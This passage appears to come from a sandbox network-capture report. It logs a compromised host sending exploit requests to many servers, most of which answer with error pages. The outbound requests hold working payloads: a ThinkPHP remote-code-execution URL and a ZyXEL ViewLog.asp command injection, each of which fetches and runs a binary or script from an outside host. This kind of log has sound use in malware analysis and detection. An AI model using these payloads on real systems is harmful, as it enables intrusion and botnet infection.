Feb 14, 2024 09:30:37.432949066 CET	432	IN	Data Raw: 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 Data Ascii: lass="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">function e(i) {return
Feb 14, 2024 09:30:37.636418104 CET	432	IN	Data Raw: 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 Data Ascii: lass="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">function e(i) {return

Session ID	Source IP	Source Port	Destination IP	Destination Port
765	192.168.2.15	45420	112.83.36.62	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:36.982645035 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:37.328341007 CET	1286	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:37 GMT Content-Type: text/html Content-Length: 2813 Connection: close x-ws-request-id: 65cc7a2d_xian62_13223-7358 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 57 65 64 2c 20 31 34 20 46 65 62 20 32 30 32 34 20 30 38 3a 33 30 3a 33 37 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 78 69 61 6e 36 32 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 62 69 6e 73 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Wed, 14 Feb 2024 08:30:37 GMT<br><span class="F">IP: 81.181.57.74</span>Node information: xian62<br>URL: http:///index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp
Feb 14, 2024 09:30:37.328357935 CET	1286	IN	Data Raw: 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 0a 09 09 09 09 3c 62 72 3e 52 65 71 75 65 73 74 2d 49 64 3a 20 Data Ascii: ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'<br>Request-Id: 65cc7a2d_xian62_13223-7358<br><br>Check:<span class="C G" onclick="s(0)">Details</span></p></div><div id="d" class="hide_me P H"><div cl
Feb 14, 2024 09:30:37.328372955 CET	432	IN	Data Raw: 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 Data Ascii: lass="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">function e(i) {return
Feb 14, 2024 09:30:37.433186054 CET	432	IN	Data Raw: 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 Data Ascii: lass="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">function e(i) {return
Feb 14, 2024 09:30:37.631592989 CET	432	IN	Data Raw: 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 Data Ascii: lass="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">function e(i) {return

Session ID	Source IP	Source Port	Destination IP	Destination Port
766	192.168.2.15	56100	95.101.149.149	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:37.193295956 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:37.400886059 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:30:37 GMT Date: Wed, 14 Feb 2024 08:30:37 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 35 36 33 32 36 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 34 33 37 26 23 34 36 3b 34 31 38 37 36 32 30 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.d5632617.1707899437.41876205</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
767	192.168.2.15	35644	95.174.28.164	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:37.193511009 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:37.406630993 CET	501	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:30:37 GMT Server: Apache/2.4.56 (Debian) Content-Length: 307 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 6e 69 61 73 61 66 65 2e 69 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at www.aniasafe.it Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
768	192.168.2.15	57652	95.217.183.141	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:37.201438904 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:37.422609091 CET	355	IN	HTTP/1.1 400 Bad Request Server: nginx/1.10.3 (Ubuntu) Date: Wed, 14 Feb 2024 08:30:37 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
769	192.168.2.15	54374	95.163.53.162	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:37.211437941 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:37.442157030 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:37 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
770	192.168.2.15	55098	95.134.64.163	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:37.227998018 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:37.475763083 CET	167	IN	HTTP/1.1 404 Not Found Content-Type: text/html Accept-Ranges: bytes Set-Cookie: HFS_SID_=0.226236936170608; path=/; HttpOnly Content-Encoding: gzip
Feb 14, 2024 09:30:37.476073027 CET	1058	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 0b 9d 56 5b 6f db 36 14 7e 0f 90 ff c0 da d8 9b 75 b1 93 b8 19 6d e7 61 49 83 16 e8 da 00 75 b1 ed a9 a0 44 ca e2 42 89 1a 49 db f1 86 fd f7 9e 43 51 f2 6d 2d b0 06 41 22 f1 f2 9d ef 3b 57 cd 5f 3d 7c bc 5f fe f1 f4 86 Data Ascii: V[o6~umaIuDBICQm-A";W_=\|_R/A$]'v{2S4I]3$o>./x2/S%@D,]v8d\|n)AN8[ne?`T;X+6"a8Bm9X?k/m\

Session ID	Source IP	Source Port	Destination IP	Destination Port
771	192.168.2.15	55042	95.86.111.177	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:37.233958960 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
772	192.168.2.15	46630	95.84.249.57	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:37.298135042 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:37.616250992 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:30:37 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
773	192.168.2.15	44096	95.50.13.87	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:37.323463917 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:38.050367117 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:38.286042929 CET	313	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
774	192.168.2.15	47324	94.120.101.124	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:37.326210976 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
775	192.168.2.15	38360	94.178.243.74	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:37.327291012 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:37.586213112 CET	21	IN	HTTP/1.1 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
776	192.168.2.15	37194	112.165.98.59	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:37.753827095 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:38.034147978 CET	504	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Wed, 14 Feb 2024 08:30:38 GMT Server: lighttpd/1.4.37 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 